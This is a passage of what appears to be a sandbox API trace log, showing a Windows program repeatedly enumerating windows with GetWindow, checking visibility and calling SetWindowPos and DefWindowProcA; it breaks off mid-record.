[0057.459] GetWindow (hWnd=0x10142, uCmd=0x2) returned 0x10138 [0057.459] GetWindow (hWnd=0x10138, uCmd=0x2) returned 0x1013c [0057.459] GetWindow (hWnd=0x1013c, uCmd=0x2) returned 0x10134 [0057.459] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10136 [0057.459] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x400dc [0057.459] GetWindow (hWnd=0x400dc, uCmd=0x2) returned 0x300e0 [0057.459] GetWindow (hWnd=0x300e0, uCmd=0x2) returned 0x10130 [0057.459] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10122 [0057.459] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10120 [0057.459] GetWindow (hWnd=0x10120, uCmd=0x2) returned 0x20116 [0057.459] GetWindow (hWnd=0x20116, uCmd=0x2) returned 0x1010a [0057.459] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x1010c [0057.459] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x2001e [0057.459] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0057.459] GetWindow (hWnd=0x20020, uCmd=0x2) returned 0x2001c [0057.459] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0057.459] GetWindow (hWnd=0x20016, uCmd=0x2) returned 0x200ae [0057.459] GetWindow (hWnd=0x200ae, uCmd=0x2) returned 0x2009e [0057.459] GetWindow (hWnd=0x2009e, uCmd=0x2) returned 0x2008c [0057.459] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0057.459] GetWindow (hWnd=0x2008e, uCmd=0x2) returned 0x20092 [0057.459] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a [0057.459] GetWindow (hWnd=0x2009a, uCmd=0x2) returned 0x300a8 [0057.459] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 0x20080 [0057.459] GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f0 [0057.459] GetWindow (hWnd=0x100f0, uCmd=0x2) returned 0x100f2 [0057.459] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x100ea [0057.459] GetWindow (hWnd=0x100ea, uCmd=0x2) returned 0x100e8 [0057.459] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e4 [0057.459] GetWindow (hWnd=0x100e4, uCmd=0x2) returned 0x100da [0057.459] GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0057.460] GetWindow (hWnd=0x50076, uCmd=0x2) returned 0x1006c [0057.460] GetWindow (hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0057.460] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x10062 [0057.460] GetWindow (hWnd=0x10062, uCmd=0x2) returned 0x10050 [0057.460] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x200fa [0057.460] GetWindow (hWnd=0x200fa, uCmd=0x2) returned 0x200fc [0057.460] GetWindow (hWnd=0x200fc, uCmd=0x2) returned 0x100f6 [0057.460] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x100f8 [0057.460] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x1004c [0057.460] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10038 [0057.460] GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0057.460] GetWindow (hWnd=0x10030, uCmd=0x2) returned 0x2002c [0057.460] GetWindow (hWnd=0x2002c, uCmd=0x2) returned 0x1002e [0057.460] GetWindow (hWnd=0x1002e, uCmd=0x2) returned 0x20026 [0057.460] GetWindow (hWnd=0x20026, uCmd=0x2) returned 0x1002a [0057.460] GetWindow (hWnd=0x1002a, uCmd=0x2) returned 0x20028 [0057.460] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0057.460] GetWindow (hWnd=0x100ee, uCmd=0x2) returned 0x100ec [0057.460] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x100ca [0057.460] GetWindow (hWnd=0x100ca, uCmd=0x2) returned 0x0 [0057.460] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.460] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.460] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.460] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.460] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0057.460] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0057.460] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa [0057.461] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.461] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0057.461] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.461] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x1005e [0057.461] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0057.461] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0057.461] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0057.461] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0057.461] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0057.461] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0057.461] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1003e [0057.461] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0057.461] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x10040 [0057.461] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.461] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x100d2 [0057.461] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.461] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0057.461] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.461] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.461] GetWindow (hWnd=0x601a8, uCmd=0x2) returned 0x70104 [0057.461] GetWindow (hWnd=0x70104, uCmd=0x2) returned 0x301fc [0057.461] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.461] GetWindow (hWnd=0x401e4, uCmd=0x2) returned 0x101e2 [0057.461] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.461] GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x601a4 [0057.461] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 0x201d4 [0057.461] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x101b6 [0057.461] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101c8 [0057.461] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.461] GetWindow (hWnd=0x201c4, uCmd=0x2) returned 0x101b8 [0057.462] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101aa [0057.462] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 0x10192 [0057.462] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.462] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0057.462] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.462] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x1018a [0057.462] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.462] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10184 [0057.462] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0057.462] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0057.462] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0057.462] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0057.462] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x1017e [0057.463] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0057.463] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0057.463] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0057.463] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0057.463] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.463] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0057.463] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0057.463] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0057.463] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0057.463] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0057.463] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0057.463] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0057.463] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0057.463] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0057.463] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x1015c [0057.463] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.463] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x7013a [0057.463] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.463] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x10156 [0057.463] GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x10158 [0057.463] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x10150 [0057.463] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10154 [0057.463] GetWindow (hWnd=0x10154, uCmd=0x2) returned 0x1014a [0057.463] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 0x1014e [0057.464] GetWindow (hWnd=0x1014e, uCmd=0x2) returned 0x10144 [0057.464] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x10148 [0057.464] GetWindow (hWnd=0x10148, uCmd=0x2) returned 0x1013e [0057.464] GetWindow (hWnd=0x1013e, uCmd=0x2) returned 0x10142 [0057.464] GetWindow (hWnd=0x10142, uCmd=0x2) returned 0x10138 [0057.464] GetWindow (hWnd=0x10138, uCmd=0x2) returned 0x1013c [0057.464] GetWindow (hWnd=0x1013c, uCmd=0x2) returned 0x10134 [0057.464] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10136 [0057.464] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x400dc [0057.464] GetWindow (hWnd=0x400dc, uCmd=0x2) returned 0x300e0 [0057.464] GetWindow (hWnd=0x300e0, uCmd=0x2) returned 0x10130 [0057.464] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10122 [0057.464] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10120 [0057.464] GetWindow (hWnd=0x10120, uCmd=0x2) returned 0x20116 [0057.464] GetWindow (hWnd=0x20116, uCmd=0x2) returned 0x1010a [0057.464] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x1010c [0057.464] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x2001e [0057.464] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0057.464] GetWindow (hWnd=0x20020, uCmd=0x2) returned 0x2001c [0057.464] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0057.464] GetWindow (hWnd=0x20016, uCmd=0x2) returned 0x200ae [0057.464] GetWindow (hWnd=0x200ae, uCmd=0x2) returned 0x2009e [0057.464] GetWindow (hWnd=0x2009e, uCmd=0x2) returned 0x2008c [0057.464] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0057.464] GetWindow (hWnd=0x2008e, uCmd=0x2) returned 0x20092 [0057.465] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a [0057.465] GetWindow (hWnd=0x2009a, uCmd=0x2) returned 0x300a8 [0057.465] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 0x20080 [0057.465] GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f0 [0057.465] GetWindow (hWnd=0x100f0, uCmd=0x2) returned 0x100f2 [0057.465] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x100ea [0057.465] GetWindow (hWnd=0x100ea, uCmd=0x2) returned 0x100e8 [0057.465] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e4 [0057.465] GetWindow (hWnd=0x100e4, uCmd=0x2) returned 0x100da [0057.465] GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0057.465] GetWindow (hWnd=0x50076, uCmd=0x2) returned 0x1006c [0057.465] GetWindow (hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0057.465] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x10062 [0057.465] GetWindow (hWnd=0x10062, uCmd=0x2) returned 0x10050 [0057.465] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x200fa [0057.465] GetWindow (hWnd=0x200fa, uCmd=0x2) returned 0x200fc [0057.465] GetWindow (hWnd=0x200fc, uCmd=0x2) returned 0x100f6 [0057.465] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x100f8 [0057.465] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x1004c [0057.465] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10038 [0057.465] GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0057.465] GetWindow (hWnd=0x10030, uCmd=0x2) returned 0x2002c [0057.465] GetWindow (hWnd=0x2002c, uCmd=0x2) returned 0x1002e [0057.465] GetWindow (hWnd=0x1002e, uCmd=0x2) returned 0x20026 [0057.466] GetWindow (hWnd=0x20026, uCmd=0x2) returned 0x1002a [0057.466] GetWindow (hWnd=0x1002a, uCmd=0x2) returned 0x20028 [0057.466] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0057.466] GetWindow (hWnd=0x100ee, uCmd=0x2) returned 0x100ec [0057.466] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x100ca [0057.466] GetWindow (hWnd=0x100ca, uCmd=0x2) returned 0x0 [0057.466] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.466] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.466] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.466] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.466] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0057.466] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0057.466] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa [0057.466] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.466] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0057.466] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.466] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x1005e [0057.466] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0057.466] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0057.466] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0057.466] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0057.466] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0057.466] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0057.466] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1003e [0057.466] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0057.466] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x10040 [0057.466] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.466] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x100d2 [0057.467] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.467] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0057.467] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.467] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.467] GetWindow (hWnd=0x601a8, uCmd=0x2) returned 0x70104 [0057.467] GetWindow (hWnd=0x70104, uCmd=0x2) returned 0x301fc [0057.467] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.467] GetWindow (hWnd=0x401e4, uCmd=0x2) returned 0x101e2 [0057.467] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.467] GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x601a4 [0057.467] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 0x201d4 [0057.467] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x101b6 [0057.467] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101c8 [0057.467] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.467] GetWindow (hWnd=0x201c4, uCmd=0x2) returned 0x101b8 [0057.467] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101aa [0057.467] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 0x10192 [0057.467] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.467] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0057.467] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.467] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x1018a [0057.467] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.467] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10184 [0057.467] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0057.467] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0057.467] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0057.467] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0057.467] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x1017e [0057.467] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0057.467] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0057.467] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0057.468] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0057.468] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.468] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0057.468] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0057.468] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0057.468] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0057.468] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0057.468] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0057.468] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0057.468] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0057.468] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0057.468] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x1015c [0057.468] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.468] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x7013a [0057.468] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.468] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x10156 [0057.468] GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x10158 [0057.468] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x10150 [0057.468] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10154 [0057.468] GetWindow (hWnd=0x10154, uCmd=0x2) returned 0x1014a [0057.468] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 0x1014e [0057.468] GetWindow (hWnd=0x1014e, uCmd=0x2) returned 0x10144 [0057.468] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x10148 [0057.468] GetWindow (hWnd=0x10148, uCmd=0x2) returned 0x1013e [0057.468] GetWindow (hWnd=0x1013e, uCmd=0x2) returned 0x10142 [0057.468] GetWindow (hWnd=0x10142, uCmd=0x2) returned 0x10138 [0057.468] GetWindow (hWnd=0x10138, uCmd=0x2) returned 0x1013c [0057.468] GetWindow (hWnd=0x1013c, uCmd=0x2) returned 0x10134 [0057.468] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10136 [0057.468] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x400dc [0057.468] GetWindow (hWnd=0x400dc, uCmd=0x2) returned 0x300e0 [0057.469] GetWindow (hWnd=0x300e0, uCmd=0x2) returned 0x10130 [0057.469] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10122 [0057.469] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10120 [0057.469] GetWindow (hWnd=0x10120, uCmd=0x2) returned 0x20116 [0057.469] GetWindow (hWnd=0x20116, uCmd=0x2) returned 0x1010a [0057.469] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x1010c [0057.469] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x2001e [0057.469] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0057.469] GetWindow (hWnd=0x20020, uCmd=0x2) returned 0x2001c [0057.469] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0057.469] GetWindow (hWnd=0x20016, uCmd=0x2) returned 0x200ae [0057.469] GetWindow (hWnd=0x200ae, uCmd=0x2) returned 0x2009e [0057.469] GetWindow (hWnd=0x2009e, uCmd=0x2) returned 0x2008c [0057.469] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0057.469] GetWindow (hWnd=0x2008e, uCmd=0x2) returned 0x20092 [0057.469] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a [0057.469] GetWindow (hWnd=0x2009a, uCmd=0x2) returned 0x300a8 [0057.469] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 0x20080 [0057.469] GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f0 [0057.469] GetWindow (hWnd=0x100f0, uCmd=0x2) returned 0x100f2 [0057.469] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x100ea [0057.469] GetWindow (hWnd=0x100ea, uCmd=0x2) returned 0x100e8 [0057.469] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e4 [0057.469] GetWindow (hWnd=0x100e4, uCmd=0x2) returned 0x100da [0057.469] GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0057.469] GetWindow (hWnd=0x50076, uCmd=0x2) returned 0x1006c [0057.469] GetWindow (hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0057.469] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x10062 [0057.469] GetWindow (hWnd=0x10062, uCmd=0x2) returned 0x10050 [0057.469] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x200fa [0057.469] GetWindow (hWnd=0x200fa, uCmd=0x2) returned 0x200fc [0057.469] GetWindow (hWnd=0x200fc, uCmd=0x2) returned 0x100f6 [0057.470] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x100f8 [0057.470] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x1004c [0057.470] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10038 [0057.470] GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0057.470] GetWindow (hWnd=0x10030, uCmd=0x2) returned 0x2002c [0057.470] GetWindow (hWnd=0x2002c, uCmd=0x2) returned 0x1002e [0057.470] GetWindow (hWnd=0x1002e, uCmd=0x2) returned 0x20026 [0057.470] GetWindow (hWnd=0x20026, uCmd=0x2) returned 0x1002a [0057.470] GetWindow (hWnd=0x1002a, uCmd=0x2) returned 0x20028 [0057.470] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0057.470] GetWindow (hWnd=0x100ee, uCmd=0x2) returned 0x100ec [0057.470] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x100ca [0057.470] GetWindow (hWnd=0x100ca, uCmd=0x2) returned 0x0 [0057.470] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.470] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.470] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.470] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.470] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0057.470] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0057.470] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa [0057.470] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.470] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0057.470] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.470] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x1005e [0057.470] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0057.470] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0057.470] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0057.470] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0057.470] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0057.471] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0057.471] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1003e [0057.471] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0057.471] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x10040 [0057.471] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.471] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x100d2 [0057.471] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.471] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0057.471] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.471] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.471] GetWindow (hWnd=0x601a8, uCmd=0x2) returned 0x70104 [0057.471] GetWindow (hWnd=0x70104, uCmd=0x2) returned 0x301fc [0057.471] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.471] GetWindow (hWnd=0x401e4, uCmd=0x2) returned 0x101e2 [0057.471] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.471] GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x601a4 [0057.471] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 0x201d4 [0057.471] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x101b6 [0057.471] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101c8 [0057.471] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.471] GetWindow (hWnd=0x201c4, uCmd=0x2) returned 0x101b8 [0057.471] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101aa [0057.471] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 0x10192 [0057.471] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.471] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0057.471] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.471] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x1018a [0057.471] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.472] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10184 [0057.472] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0057.472] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0057.472] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0057.472] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0057.472] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x1017e [0057.472] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0057.472] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0057.472] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0057.472] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0057.472] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.472] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0057.472] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0057.472] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0057.472] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0057.472] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0057.472] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0057.472] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0057.472] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0057.472] GetWindow (hWnd=0x10160, uCmd=0x2) returned 